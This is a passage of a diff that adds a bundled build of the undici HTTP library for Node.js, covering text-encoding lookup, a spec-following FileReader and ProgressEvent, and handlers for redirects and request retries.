'x-cp1257': + return 'windows-1257' + case 'cp1258': + case 'windows-1258': + case 'x-cp1258': + return 'windows-1258' + case 'x-mac-cyrillic': + case 'x-mac-ukrainian': + return 'x-mac-cyrillic' + case 'chinese': + case 'csgb2312': + case 'csiso58gb231280': + case 'gb2312': + case 'gb_2312': + case 'gb_2312-80': + case 'gbk': + case 'iso-ir-58': + case 'x-gbk': + return 'GBK' + case 'gb18030': + return 'gb18030' + case 'big5': + case 'big5-hkscs': + case 'cn-big5': + case 'csbig5': + case 'x-x-big5': + return 'Big5' + case 'cseucpkdfmtjapanese': + case 'euc-jp': + case 'x-euc-jp': + return 'EUC-JP' + case 'csiso2022jp': + case 'iso-2022-jp': + return 'ISO-2022-JP' + case 'csshiftjis': + case 'ms932': + case 'ms_kanji': + case 'shift-jis': + case 'shift_jis': + case 'sjis': + case 'windows-31j': + case 'x-sjis': + return 'Shift_JIS' + case 'cseuckr': + case 'csksc56011987': + case 'euc-kr': + case 'iso-ir-149': + case 'korean': + case 'ks_c_5601-1987': + case 'ks_c_5601-1989': + case 'ksc5601': + case 'ksc_5601': + case 'windows-949': + return 'EUC-KR' + case 'csiso2022kr': + case 'hz-gb-2312': + case 'iso-2022-cn': + case 'iso-2022-cn-ext': + case 'iso-2022-kr': + case 'replacement': + return 'replacement' + case 'unicodefffe': + case 'utf-16be': + return 'UTF-16BE' + case 'csunicode': + case 'iso-10646-ucs-2': + case 'ucs-2': + case 'unicode': + case 'unicodefeff': + case 'utf-16': + case 'utf-16le': + return 'UTF-16LE' + case 'x-user-defined': + return 'x-user-defined' + default: return 'failure' + } +} + +module.exports = { + getEncoding +} + + +/***/ }), + +/***/ 1446: +/***/ ((module, __unused_webpack_exports, __nccwpck_require__) => { + +"use strict"; + + +const { + staticPropertyDescriptors, + readOperation, + fireAProgressEvent +} = __nccwpck_require__(7530) +const { + kState, + kError, + kResult, + kEvents, + kAborted +} = __nccwpck_require__(9054) +const { webidl } = __nccwpck_require__(1744) +const { kEnumerableProperty } = __nccwpck_require__(3983) + 
+class FileReader extends EventTarget { + constructor () { + super() + + this[kState] = 'empty' + this[kResult] = null + this[kError] = null + this[kEvents] = { + loadend: null, + error: null, + abort: null, + load: null, + progress: null, + loadstart: null + } + } + + /** + * @see https://w3c.github.io/FileAPI/#dfn-readAsArrayBuffer + * @param {import('buffer').Blob} blob + */ + readAsArrayBuffer (blob) { + webidl.brandCheck(this, FileReader) + + webidl.argumentLengthCheck(arguments, 1, { header: 'FileReader.readAsArrayBuffer' }) + + blob = webidl.converters.Blob(blob, { strict: false }) + + // The readAsArrayBuffer(blob) method, when invoked, + // must initiate a read operation for blob with ArrayBuffer. + readOperation(this, blob, 'ArrayBuffer') + } + + /** + * @see https://w3c.github.io/FileAPI/#readAsBinaryString + * @param {import('buffer').Blob} blob + */ + readAsBinaryString (blob) { + webidl.brandCheck(this, FileReader) + + webidl.argumentLengthCheck(arguments, 1, { header: 'FileReader.readAsBinaryString' }) + + blob = webidl.converters.Blob(blob, { strict: false }) + + // The readAsBinaryString(blob) method, when invoked, + // must initiate a read operation for blob with BinaryString. + readOperation(this, blob, 'BinaryString') + } + + /** + * @see https://w3c.github.io/FileAPI/#readAsDataText + * @param {import('buffer').Blob} blob + * @param {string?} encoding + */ + readAsText (blob, encoding = undefined) { + webidl.brandCheck(this, FileReader) + + webidl.argumentLengthCheck(arguments, 1, { header: 'FileReader.readAsText' }) + + blob = webidl.converters.Blob(blob, { strict: false }) + + if (encoding !== undefined) { + encoding = webidl.converters.DOMString(encoding) + } + + // The readAsText(blob, encoding) method, when invoked, + // must initiate a read operation for blob with Text and encoding. 
+ readOperation(this, blob, 'Text', encoding) + } + + /** + * @see https://w3c.github.io/FileAPI/#dfn-readAsDataURL + * @param {import('buffer').Blob} blob + */ + readAsDataURL (blob) { + webidl.brandCheck(this, FileReader) + + webidl.argumentLengthCheck(arguments, 1, { header: 'FileReader.readAsDataURL' }) + + blob = webidl.converters.Blob(blob, { strict: false }) + + // The readAsDataURL(blob) method, when invoked, must + // initiate a read operation for blob with DataURL. + readOperation(this, blob, 'DataURL') + } + + /** + * @see https://w3c.github.io/FileAPI/#dfn-abort + */ + abort () { + // 1. If this's state is "empty" or if this's state is + // "done" set this's result to null and terminate + // this algorithm. + if (this[kState] === 'empty' || this[kState] === 'done') { + this[kResult] = null + return + } + + // 2. If this's state is "loading" set this's state to + // "done" and set this's result to null. + if (this[kState] === 'loading') { + this[kState] = 'done' + this[kResult] = null + } + + // 3. If there are any tasks from this on the file reading + // task source in an affiliated task queue, then remove + // those tasks from that task queue. + this[kAborted] = true + + // 4. Terminate the algorithm for the read method being processed. + // TODO + + // 5. Fire a progress event called abort at this. + fireAProgressEvent('abort', this) + + // 6. If this's state is not "loading", fire a progress + // event called loadend at this. 
+ if (this[kState] !== 'loading') { + fireAProgressEvent('loadend', this) + } + } + + /** + * @see https://w3c.github.io/FileAPI/#dom-filereader-readystate + */ + get readyState () { + webidl.brandCheck(this, FileReader) + + switch (this[kState]) { + case 'empty': return this.EMPTY + case 'loading': return this.LOADING + case 'done': return this.DONE + } + } + + /** + * @see https://w3c.github.io/FileAPI/#dom-filereader-result + */ + get result () { + webidl.brandCheck(this, FileReader) + + // The result attribute’s getter, when invoked, must return + // this's result. + return this[kResult] + } + + /** + * @see https://w3c.github.io/FileAPI/#dom-filereader-error + */ + get error () { + webidl.brandCheck(this, FileReader) + + // The error attribute’s getter, when invoked, must return + // this's error. + return this[kError] + } + + get onloadend () { + webidl.brandCheck(this, FileReader) + + return this[kEvents].loadend + } + + set onloadend (fn) { + webidl.brandCheck(this, FileReader) + + if (this[kEvents].loadend) { + this.removeEventListener('loadend', this[kEvents].loadend) + } + + if (typeof fn === 'function') { + this[kEvents].loadend = fn + this.addEventListener('loadend', fn) + } else { + this[kEvents].loadend = null + } + } + + get onerror () { + webidl.brandCheck(this, FileReader) + + return this[kEvents].error + } + + set onerror (fn) { + webidl.brandCheck(this, FileReader) + + if (this[kEvents].error) { + this.removeEventListener('error', this[kEvents].error) + } + + if (typeof fn === 'function') { + this[kEvents].error = fn + this.addEventListener('error', fn) + } else { + this[kEvents].error = null + } + } + + get onloadstart () { + webidl.brandCheck(this, FileReader) + + return this[kEvents].loadstart + } + + set onloadstart (fn) { + webidl.brandCheck(this, FileReader) + + if (this[kEvents].loadstart) { + this.removeEventListener('loadstart', this[kEvents].loadstart) + } + + if (typeof fn === 'function') { + this[kEvents].loadstart = fn + 
this.addEventListener('loadstart', fn) + } else { + this[kEvents].loadstart = null + } + } + + get onprogress () { + webidl.brandCheck(this, FileReader) + + return this[kEvents].progress + } + + set onprogress (fn) { + webidl.brandCheck(this, FileReader) + + if (this[kEvents].progress) { + this.removeEventListener('progress', this[kEvents].progress) + } + + if (typeof fn === 'function') { + this[kEvents].progress = fn + this.addEventListener('progress', fn) + } else { + this[kEvents].progress = null + } + } + + get onload () { + webidl.brandCheck(this, FileReader) + + return this[kEvents].load + } + + set onload (fn) { + webidl.brandCheck(this, FileReader) + + if (this[kEvents].load) { + this.removeEventListener('load', this[kEvents].load) + } + + if (typeof fn === 'function') { + this[kEvents].load = fn + this.addEventListener('load', fn) + } else { + this[kEvents].load = null + } + } + + get onabort () { + webidl.brandCheck(this, FileReader) + + return this[kEvents].abort + } + + set onabort (fn) { + webidl.brandCheck(this, FileReader) + + if (this[kEvents].abort) { + this.removeEventListener('abort', this[kEvents].abort) + } + + if (typeof fn === 'function') { + this[kEvents].abort = fn + this.addEventListener('abort', fn) + } else { + this[kEvents].abort = null + } + } +} + +// https://w3c.github.io/FileAPI/#dom-filereader-empty +FileReader.EMPTY = FileReader.prototype.EMPTY = 0 +// https://w3c.github.io/FileAPI/#dom-filereader-loading +FileReader.LOADING = FileReader.prototype.LOADING = 1 +// https://w3c.github.io/FileAPI/#dom-filereader-done +FileReader.DONE = FileReader.prototype.DONE = 2 + +Object.defineProperties(FileReader.prototype, { + EMPTY: staticPropertyDescriptors, + LOADING: staticPropertyDescriptors, + DONE: staticPropertyDescriptors, + readAsArrayBuffer: kEnumerableProperty, + readAsBinaryString: kEnumerableProperty, + readAsText: kEnumerableProperty, + readAsDataURL: kEnumerableProperty, + abort: kEnumerableProperty, + readyState: 
kEnumerableProperty, + result: kEnumerableProperty, + error: kEnumerableProperty, + onloadstart: kEnumerableProperty, + onprogress: kEnumerableProperty, + onload: kEnumerableProperty, + onabort: kEnumerableProperty, + onerror: kEnumerableProperty, + onloadend: kEnumerableProperty, + [Symbol.toStringTag]: { + value: 'FileReader', + writable: false, + enumerable: false, + configurable: true + } +}) + +Object.defineProperties(FileReader, { + EMPTY: staticPropertyDescriptors, + LOADING: staticPropertyDescriptors, + DONE: staticPropertyDescriptors +}) + +module.exports = { + FileReader +} + + +/***/ }), + +/***/ 5504: +/***/ ((module, __unused_webpack_exports, __nccwpck_require__) => { + +"use strict"; + + +const { webidl } = __nccwpck_require__(1744) + +const kState = Symbol('ProgressEvent state') + +/** + * @see https://xhr.spec.whatwg.org/#progressevent + */ +class ProgressEvent extends Event { + constructor (type, eventInitDict = {}) { + type = webidl.converters.DOMString(type) + eventInitDict = webidl.converters.ProgressEventInit(eventInitDict ?? 
{}) + + super(type, eventInitDict) + + this[kState] = { + lengthComputable: eventInitDict.lengthComputable, + loaded: eventInitDict.loaded, + total: eventInitDict.total + } + } + + get lengthComputable () { + webidl.brandCheck(this, ProgressEvent) + + return this[kState].lengthComputable + } + + get loaded () { + webidl.brandCheck(this, ProgressEvent) + + return this[kState].loaded + } + + get total () { + webidl.brandCheck(this, ProgressEvent) + + return this[kState].total + } +} + +webidl.converters.ProgressEventInit = webidl.dictionaryConverter([ + { + key: 'lengthComputable', + converter: webidl.converters.boolean, + defaultValue: false + }, + { + key: 'loaded', + converter: webidl.converters['unsigned long long'], + defaultValue: 0 + }, + { + key: 'total', + converter: webidl.converters['unsigned long long'], + defaultValue: 0 + }, + { + key: 'bubbles', + converter: webidl.converters.boolean, + defaultValue: false + }, + { + key: 'cancelable', + converter: webidl.converters.boolean, + defaultValue: false + }, + { + key: 'composed', + converter: webidl.converters.boolean, + defaultValue: false + } +]) + +module.exports = { + ProgressEvent +} + + +/***/ }), + +/***/ 9054: +/***/ ((module) => { + +"use strict"; + + +module.exports = { + kState: Symbol('FileReader state'), + kResult: Symbol('FileReader result'), + kError: Symbol('FileReader error'), + kLastProgressEventFired: Symbol('FileReader last progress event fired timestamp'), + kEvents: Symbol('FileReader events'), + kAborted: Symbol('FileReader aborted') +} + + +/***/ }), + +/***/ 7530: +/***/ ((module, __unused_webpack_exports, __nccwpck_require__) => { + +"use strict"; + + +const { + kState, + kError, + kResult, + kAborted, + kLastProgressEventFired +} = __nccwpck_require__(9054) +const { ProgressEvent } = __nccwpck_require__(5504) +const { getEncoding } = __nccwpck_require__(4854) +const { DOMException } = __nccwpck_require__(1037) +const { serializeAMimeType, parseMIMEType } = __nccwpck_require__(685) 
+const { types } = __nccwpck_require__(3837) +const { StringDecoder } = __nccwpck_require__(1576) +const { btoa } = __nccwpck_require__(4300) + +/** @type {PropertyDescriptor} */ +const staticPropertyDescriptors = { + enumerable: true, + writable: false, + configurable: false +} + +/** + * @see https://w3c.github.io/FileAPI/#readOperation + * @param {import('./filereader').FileReader} fr + * @param {import('buffer').Blob} blob + * @param {string} type + * @param {string?} encodingName + */ +function readOperation (fr, blob, type, encodingName) { + // 1. If fr’s state is "loading", throw an InvalidStateError + // DOMException. + if (fr[kState] === 'loading') { + throw new DOMException('Invalid state', 'InvalidStateError') + } + + // 2. Set fr’s state to "loading". + fr[kState] = 'loading' + + // 3. Set fr’s result to null. + fr[kResult] = null + + // 4. Set fr’s error to null. + fr[kError] = null + + // 5. Let stream be the result of calling get stream on blob. + /** @type {import('stream/web').ReadableStream} */ + const stream = blob.stream() + + // 6. Let reader be the result of getting a reader from stream. + const reader = stream.getReader() + + // 7. Let bytes be an empty byte sequence. + /** @type {Uint8Array[]} */ + const bytes = [] + + // 8. Let chunkPromise be the result of reading a chunk from + // stream with reader. + let chunkPromise = reader.read() + + // 9. Let isFirstChunk be true. + let isFirstChunk = true + + // 10. In parallel, while true: + // Note: "In parallel" just means non-blocking + // Note 2: readOperation itself cannot be async as double + // reading the body would then reject the promise, instead + // of throwing an error. + ;(async () => { + while (!fr[kAborted]) { + // 1. Wait for chunkPromise to be fulfilled or rejected. + try { + const { done, value } = await chunkPromise + + // 2. If chunkPromise is fulfilled, and isFirstChunk is + // true, queue a task to fire a progress event called + // loadstart at fr. 
+ if (isFirstChunk && !fr[kAborted]) { + queueMicrotask(() => { + fireAProgressEvent('loadstart', fr) + }) + } + + // 3. Set isFirstChunk to false. + isFirstChunk = false + + // 4. If chunkPromise is fulfilled with an object whose + // done property is false and whose value property is + // a Uint8Array object, run these steps: + if (!done && types.isUint8Array(value)) { + // 1. Let bs be the byte sequence represented by the + // Uint8Array object. + + // 2. Append bs to bytes. + bytes.push(value) + + // 3. If roughly 50ms have passed since these steps + // were last invoked, queue a task to fire a + // progress event called progress at fr. + if ( + ( + fr[kLastProgressEventFired] === undefined || + Date.now() - fr[kLastProgressEventFired] >= 50 + ) && + !fr[kAborted] + ) { + fr[kLastProgressEventFired] = Date.now() + queueMicrotask(() => { + fireAProgressEvent('progress', fr) + }) + } + + // 4. Set chunkPromise to the result of reading a + // chunk from stream with reader. + chunkPromise = reader.read() + } else if (done) { + // 5. Otherwise, if chunkPromise is fulfilled with an + // object whose done property is true, queue a task + // to run the following steps and abort this algorithm: + queueMicrotask(() => { + // 1. Set fr’s state to "done". + fr[kState] = 'done' + + // 2. Let result be the result of package data given + // bytes, type, blob’s type, and encodingName. + try { + const result = packageData(bytes, type, blob.type, encodingName) + + // 4. Else: + + if (fr[kAborted]) { + return + } + + // 1. Set fr’s result to result. + fr[kResult] = result + + // 2. Fire a progress event called load at the fr. + fireAProgressEvent('load', fr) + } catch (error) { + // 3. If package data threw an exception error: + + // 1. Set fr’s error to error. + fr[kError] = error + + // 2. Fire a progress event called error at fr. + fireAProgressEvent('error', fr) + } + + // 5. If fr’s state is not "loading", fire a progress + // event called loadend at the fr. 
+ if (fr[kState] !== 'loading') { + fireAProgressEvent('loadend', fr) + } + }) + + break + } + } catch (error) { + if (fr[kAborted]) { + return + } + + // 6. Otherwise, if chunkPromise is rejected with an + // error error, queue a task to run the following + // steps and abort this algorithm: + queueMicrotask(() => { + // 1. Set fr’s state to "done". + fr[kState] = 'done' + + // 2. Set fr’s error to error. + fr[kError] = error + + // 3. Fire a progress event called error at fr. + fireAProgressEvent('error', fr) + + // 4. If fr’s state is not "loading", fire a progress + // event called loadend at fr. + if (fr[kState] !== 'loading') { + fireAProgressEvent('loadend', fr) + } + }) + + break + } + } + })() +} + +/** + * @see https://w3c.github.io/FileAPI/#fire-a-progress-event + * @see https://dom.spec.whatwg.org/#concept-event-fire + * @param {string} e The name of the event + * @param {import('./filereader').FileReader} reader + */ +function fireAProgressEvent (e, reader) { + // The progress event e does not bubble. e.bubbles must be false + // The progress event e is NOT cancelable. e.cancelable must be false + const event = new ProgressEvent(e, { + bubbles: false, + cancelable: false + }) + + reader.dispatchEvent(event) +} + +/** + * @see https://w3c.github.io/FileAPI/#blob-package-data + * @param {Uint8Array[]} bytes + * @param {string} type + * @param {string?} mimeType + * @param {string?} encodingName + */ +function packageData (bytes, type, mimeType, encodingName) { + // 1. A Blob has an associated package data algorithm, given + // bytes, a type, a optional mimeType, and a optional + // encodingName, which switches on type and runs the + // associated steps: + + switch (type) { + case 'DataURL': { + // 1. Return bytes as a DataURL [RFC2397] subject to + // the considerations below: + // * Use mimeType as part of the Data URL if it is + // available in keeping with the Data URL + // specification [RFC2397]. 
+ // * If mimeType is not available return a Data URL + // without a media-type. [RFC2397]. + + // https://datatracker.ietf.org/doc/html/rfc2397#section-3 + // dataurl := "data:" [ mediatype ] [ ";base64" ] "," data + // mediatype := [ type "/" subtype ] *( ";" parameter ) + // data := *urlchar + // parameter := attribute "=" value + let dataURL = 'data:' + + const parsed = parseMIMEType(mimeType || 'application/octet-stream') + + if (parsed !== 'failure') { + dataURL += serializeAMimeType(parsed) + } + + dataURL += ';base64,' + + const decoder = new StringDecoder('latin1') + + for (const chunk of bytes) { + dataURL += btoa(decoder.write(chunk)) + } + + dataURL += btoa(decoder.end()) + + return dataURL + } + case 'Text': { + // 1. Let encoding be failure + let encoding = 'failure' + + // 2. If the encodingName is present, set encoding to the + // result of getting an encoding from encodingName. + if (encodingName) { + encoding = getEncoding(encodingName) + } + + // 3. If encoding is failure, and mimeType is present: + if (encoding === 'failure' && mimeType) { + // 1. Let type be the result of parse a MIME type + // given mimeType. + const type = parseMIMEType(mimeType) + + // 2. If type is not failure, set encoding to the result + // of getting an encoding from type’s parameters["charset"]. + if (type !== 'failure') { + encoding = getEncoding(type.parameters.get('charset')) + } + } + + // 4. If encoding is failure, then set encoding to UTF-8. + if (encoding === 'failure') { + encoding = 'UTF-8' + } + + // 5. Decode bytes using fallback encoding encoding, and + // return the result. + return decode(bytes, encoding) + } + case 'ArrayBuffer': { + // Return a new ArrayBuffer whose contents are bytes. + const sequence = combineByteSequences(bytes) + + return sequence.buffer + } + case 'BinaryString': { + // Return bytes as a binary string, in which every byte + // is represented by a code unit of equal value [0..255]. 
+ let binaryString = '' + + const decoder = new StringDecoder('latin1') + + for (const chunk of bytes) { + binaryString += decoder.write(chunk) + } + + binaryString += decoder.end() + + return binaryString + } + } +} + +/** + * @see https://encoding.spec.whatwg.org/#decode + * @param {Uint8Array[]} ioQueue + * @param {string} encoding + */ +function decode (ioQueue, encoding) { + const bytes = combineByteSequences(ioQueue) + + // 1. Let BOMEncoding be the result of BOM sniffing ioQueue. + const BOMEncoding = BOMSniffing(bytes) + + let slice = 0 + + // 2. If BOMEncoding is non-null: + if (BOMEncoding !== null) { + // 1. Set encoding to BOMEncoding. + encoding = BOMEncoding + + // 2. Read three bytes from ioQueue, if BOMEncoding is + // UTF-8; otherwise read two bytes. + // (Do nothing with those bytes.) + slice = BOMEncoding === 'UTF-8' ? 3 : 2 + } + + // 3. Process a queue with an instance of encoding’s + // decoder, ioQueue, output, and "replacement". + + // 4. Return output. + + const sliced = bytes.slice(slice) + return new TextDecoder(encoding).decode(sliced) +} + +/** + * @see https://encoding.spec.whatwg.org/#bom-sniff + * @param {Uint8Array} ioQueue + */ +function BOMSniffing (ioQueue) { + // 1. Let BOM be the result of peeking 3 bytes from ioQueue, + // converted to a byte sequence. + const [a, b, c] = ioQueue + + // 2. For each of the rows in the table below, starting with + // the first one and going down, if BOM starts with the + // bytes given in the first column, then return the + // encoding given in the cell in the second column of that + // row. Otherwise, return null. 
+ if (a === 0xEF && b === 0xBB && c === 0xBF) { + return 'UTF-8' + } else if (a === 0xFE && b === 0xFF) { + return 'UTF-16BE' + } else if (a === 0xFF && b === 0xFE) { + return 'UTF-16LE' + } + + return null +} + +/** + * @param {Uint8Array[]} sequences + */ +function combineByteSequences (sequences) { + const size = sequences.reduce((a, b) => { + return a + b.byteLength + }, 0) + + let offset = 0 + + return sequences.reduce((a, b) => { + a.set(b, offset) + offset += b.byteLength + return a + }, new Uint8Array(size)) +} + +module.exports = { + staticPropertyDescriptors, + readOperation, + fireAProgressEvent +} + + +/***/ }), + +/***/ 1892: +/***/ ((module, __unused_webpack_exports, __nccwpck_require__) => { + +"use strict"; + + +// We include a version number for the Dispatcher API. In case of breaking changes, +// this version number must be increased to avoid conflicts. +const globalDispatcher = Symbol.for('undici.globalDispatcher.1') +const { InvalidArgumentError } = __nccwpck_require__(8045) +const Agent = __nccwpck_require__(7890) + +if (getGlobalDispatcher() === undefined) { + setGlobalDispatcher(new Agent()) +} + +function setGlobalDispatcher (agent) { + if (!agent || typeof agent.dispatch !== 'function') { + throw new InvalidArgumentError('Argument agent must implement Agent') + } + Object.defineProperty(globalThis, globalDispatcher, { + value: agent, + writable: true, + enumerable: false, + configurable: false + }) +} + +function getGlobalDispatcher () { + return globalThis[globalDispatcher] +} + +module.exports = { + setGlobalDispatcher, + getGlobalDispatcher +} + + +/***/ }), + +/***/ 6930: +/***/ ((module) => { + +"use strict"; + + +module.exports = class DecoratorHandler { + constructor (handler) { + this.handler = handler + } + + onConnect (...args) { + return this.handler.onConnect(...args) + } + + onError (...args) { + return this.handler.onError(...args) + } + + onUpgrade (...args) { + return this.handler.onUpgrade(...args) + } + + onHeaders 
(...args) { + return this.handler.onHeaders(...args) + } + + onData (...args) { + return this.handler.onData(...args) + } + + onComplete (...args) { + return this.handler.onComplete(...args) + } + + onBodySent (...args) { + return this.handler.onBodySent(...args) + } +} + + +/***/ }), + +/***/ 2860: +/***/ ((module, __unused_webpack_exports, __nccwpck_require__) => { + +"use strict"; + + +const util = __nccwpck_require__(3983) +const { kBodyUsed } = __nccwpck_require__(2785) +const assert = __nccwpck_require__(9491) +const { InvalidArgumentError } = __nccwpck_require__(8045) +const EE = __nccwpck_require__(2361) + +const redirectableStatusCodes = [300, 301, 302, 303, 307, 308] + +const kBody = Symbol('body') + +class BodyAsyncIterable { + constructor (body) { + this[kBody] = body + this[kBodyUsed] = false + } + + async * [Symbol.asyncIterator] () { + assert(!this[kBodyUsed], 'disturbed') + this[kBodyUsed] = true + yield * this[kBody] + } +} + +class RedirectHandler { + constructor (dispatch, maxRedirections, opts, handler) { + if (maxRedirections != null && (!Number.isInteger(maxRedirections) || maxRedirections < 0)) { + throw new InvalidArgumentError('maxRedirections must be a positive number') + } + + util.validateHandler(handler, opts.method, opts.upgrade) + + this.dispatch = dispatch + this.location = null + this.abort = null + this.opts = { ...opts, maxRedirections: 0 } // opts must be a copy + this.maxRedirections = maxRedirections + this.handler = handler + this.history = [] + + if (util.isStream(this.opts.body)) { + // TODO (fix): Provide some way for the user to cache the file to e.g. /tmp + // so that it can be dispatched again? + // TODO (fix): Do we need 100-expect support to provide a way to do this properly? 
+ if (util.bodyLength(this.opts.body) === 0) { + this.opts.body + .on('data', function () { + assert(false) + }) + } + + if (typeof this.opts.body.readableDidRead !== 'boolean') { + this.opts.body[kBodyUsed] = false + EE.prototype.on.call(this.opts.body, 'data', function () { + this[kBodyUsed] = true + }) + } + } else if (this.opts.body && typeof this.opts.body.pipeTo === 'function') { + // TODO (fix): We can't access ReadableStream internal state + // to determine whether or not it has been disturbed. This is just + // a workaround. + this.opts.body = new BodyAsyncIterable(this.opts.body) + } else if ( + this.opts.body && + typeof this.opts.body !== 'string' && + !ArrayBuffer.isView(this.opts.body) && + util.isIterable(this.opts.body) + ) { + // TODO: Should we allow re-using iterable if !this.opts.idempotent + // or through some other flag? + this.opts.body = new BodyAsyncIterable(this.opts.body) + } + } + + onConnect (abort) { + this.abort = abort + this.handler.onConnect(abort, { history: this.history }) + } + + onUpgrade (statusCode, headers, socket) { + this.handler.onUpgrade(statusCode, headers, socket) + } + + onError (error) { + this.handler.onError(error) + } + + onHeaders (statusCode, headers, resume, statusText) { + this.location = this.history.length >= this.maxRedirections || util.isDisturbed(this.opts.body) + ? null + : parseLocation(statusCode, headers) + + if (this.opts.origin) { + this.history.push(new URL(this.opts.path, this.opts.origin)) + } + + if (!this.location) { + return this.handler.onHeaders(statusCode, headers, resume, statusText) + } + + const { origin, pathname, search } = util.parseURL(new URL(this.location, this.opts.origin && new URL(this.opts.path, this.opts.origin))) + const path = search ? `${pathname}${search}` : pathname + + // Remove headers referring to the original URL. + // By default it is Host only, unless it's a 303 (see below), which removes also all Content-* headers. 
+ // https://tools.ietf.org/html/rfc7231#section-6.4 + this.opts.headers = cleanRequestHeaders(this.opts.headers, statusCode === 303, this.opts.origin !== origin) + this.opts.path = path + this.opts.origin = origin + this.opts.maxRedirections = 0 + this.opts.query = null + + // https://tools.ietf.org/html/rfc7231#section-6.4.4 + // In case of HTTP 303, always replace method to be either HEAD or GET + if (statusCode === 303 && this.opts.method !== 'HEAD') { + this.opts.method = 'GET' + this.opts.body = null + } + } + + onData (chunk) { + if (this.location) { + /* + https://tools.ietf.org/html/rfc7231#section-6.4 + + TLDR: undici always ignores 3xx response bodies. + + Redirection is used to serve the requested resource from another URL, so it is assumes that + no body is generated (and thus can be ignored). Even though generating a body is not prohibited. + + For status 301, 302, 303, 307 and 308 (the latter from RFC 7238), the specs mention that the body usually + (which means it's optional and not mandated) contain just an hyperlink to the value of + the Location response header, so the body can be ignored safely. + + For status 300, which is "Multiple Choices", the spec mentions both generating a Location + response header AND a response body with the other possible location to follow. + Since the spec explicitily chooses not to specify a format for such body and leave it to + servers and browsers implementors, we ignore the body as there is no specified way to eventually parse it. + */ + } else { + return this.handler.onData(chunk) + } + } + + onComplete (trailers) { + if (this.location) { + /* + https://tools.ietf.org/html/rfc7231#section-6.4 + + TLDR: undici always ignores 3xx response trailers as they are not expected in case of redirections + and neither are useful if present. + + See comment on onData method above for more detailed informations. 
+ */ + + this.location = null + this.abort = null + + this.dispatch(this.opts, this) + } else { + this.handler.onComplete(trailers) + } + } + + onBodySent (chunk) { + if (this.handler.onBodySent) { + this.handler.onBodySent(chunk) + } + } +} + +function parseLocation (statusCode, headers) { + if (redirectableStatusCodes.indexOf(statusCode) === -1) { + return null + } + + for (let i = 0; i < headers.length; i += 2) { + if (headers[i].toString().toLowerCase() === 'location') { + return headers[i + 1] + } + } +} + +// https://tools.ietf.org/html/rfc7231#section-6.4.4 +function shouldRemoveHeader (header, removeContent, unknownOrigin) { + return ( + (header.length === 4 && header.toString().toLowerCase() === 'host') || + (removeContent && header.toString().toLowerCase().indexOf('content-') === 0) || + (unknownOrigin && header.length === 13 && header.toString().toLowerCase() === 'authorization') || + (unknownOrigin && header.length === 6 && header.toString().toLowerCase() === 'cookie') + ) +} + +// https://tools.ietf.org/html/rfc7231#section-6.4 +function cleanRequestHeaders (headers, removeContent, unknownOrigin) { + const ret = [] + if (Array.isArray(headers)) { + for (let i = 0; i < headers.length; i += 2) { + if (!shouldRemoveHeader(headers[i], removeContent, unknownOrigin)) { + ret.push(headers[i], headers[i + 1]) + } + } + } else if (headers && typeof headers === 'object') { + for (const key of Object.keys(headers)) { + if (!shouldRemoveHeader(key, removeContent, unknownOrigin)) { + ret.push(key, headers[key]) + } + } + } else { + assert(headers == null, 'headers must be an object or an array') + } + return ret +} + +module.exports = RedirectHandler + + +/***/ }), + +/***/ 2286: +/***/ ((module, __unused_webpack_exports, __nccwpck_require__) => { + +const assert = __nccwpck_require__(9491) + +const { kRetryHandlerDefaultRetry } = __nccwpck_require__(2785) +const { RequestRetryError } = __nccwpck_require__(8045) +const { isDisturbed, parseHeaders, parseRangeHeader 
} = __nccwpck_require__(3983) + +function calculateRetryAfterHeader (retryAfter) { + const current = Date.now() + const diff = new Date(retryAfter).getTime() - current + + return diff +} + +class RetryHandler { + constructor (opts, handlers) { + const { retryOptions, ...dispatchOpts } = opts + const { + // Retry scoped + retry: retryFn, + maxRetries, + maxTimeout, + minTimeout, + timeoutFactor, + // Response scoped + methods, + errorCodes, + retryAfter, + statusCodes + } = retryOptions ?? {} + + this.dispatch = handlers.dispatch + this.handler = handlers.handler + this.opts = dispatchOpts + this.abort = null + this.aborted = false + this.retryOpts = { + retry: retryFn ?? RetryHandler[kRetryHandlerDefaultRetry], + retryAfter: retryAfter ?? true, + maxTimeout: maxTimeout ?? 30 * 1000, // 30s, + timeout: minTimeout ?? 500, // .5s + timeoutFactor: timeoutFactor ?? 2, + maxRetries: maxRetries ?? 5, + // What errors we should retry + methods: methods ?? ['GET', 'HEAD', 'OPTIONS', 'PUT', 'DELETE', 'TRACE'], + // Indicates which errors to retry + statusCodes: statusCodes ?? [500, 502, 503, 504, 429], + // List of errors to retry + errorCodes: errorCodes ?? 
[ + 'ECONNRESET', + 'ECONNREFUSED', + 'ENOTFOUND', + 'ENETDOWN', + 'ENETUNREACH', + 'EHOSTDOWN', + 'EHOSTUNREACH', + 'EPIPE' + ] + } + + this.retryCount = 0 + this.start = 0 + this.end = null + this.etag = null + this.resume = null + + // Handle possible onConnect duplication + this.handler.onConnect(reason => { + this.aborted = true + if (this.abort) { + this.abort(reason) + } else { + this.reason = reason + } + }) + } + + onRequestSent () { + if (this.handler.onRequestSent) { + this.handler.onRequestSent() + } + } + + onUpgrade (statusCode, headers, socket) { + if (this.handler.onUpgrade) { + this.handler.onUpgrade(statusCode, headers, socket) + } + } + + onConnect (abort) { + if (this.aborted) { + abort(this.reason) + } else { + this.abort = abort + } + } + + onBodySent (chunk) { + if (this.handler.onBodySent) return this.handler.onBodySent(chunk) + } + + static [kRetryHandlerDefaultRetry] (err, { state, opts }, cb) { + const { statusCode, code, headers } = err + const { method, retryOptions } = opts + const { + maxRetries, + timeout, + maxTimeout, + timeoutFactor, + statusCodes, + errorCodes, + methods + } = retryOptions + let { counter, currentTimeout } = state + + currentTimeout = + currentTimeout != null && currentTimeout > 0 ? 
currentTimeout : timeout + + // Any code that is not a Undici's originated and allowed to retry + if ( + code && + code !== 'UND_ERR_REQ_RETRY' && + code !== 'UND_ERR_SOCKET' && + !errorCodes.includes(code) + ) { + cb(err) + return + } + + // If a set of method are provided and the current method is not in the list + if (Array.isArray(methods) && !methods.includes(method)) { + cb(err) + return + } + + // If a set of status code are provided and the current status code is not in the list + if ( + statusCode != null && + Array.isArray(statusCodes) && + !statusCodes.includes(statusCode) + ) { + cb(err) + return + } + + // If we reached the max number of retries + if (counter > maxRetries) { + cb(err) + return + } + + let retryAfterHeader = headers != null && headers['retry-after'] + if (retryAfterHeader) { + retryAfterHeader = Number(retryAfterHeader) + retryAfterHeader = isNaN(retryAfterHeader) + ? calculateRetryAfterHeader(retryAfterHeader) + : retryAfterHeader * 1e3 // Retry-After is in seconds + } + + const retryTimeout = + retryAfterHeader > 0 + ? 
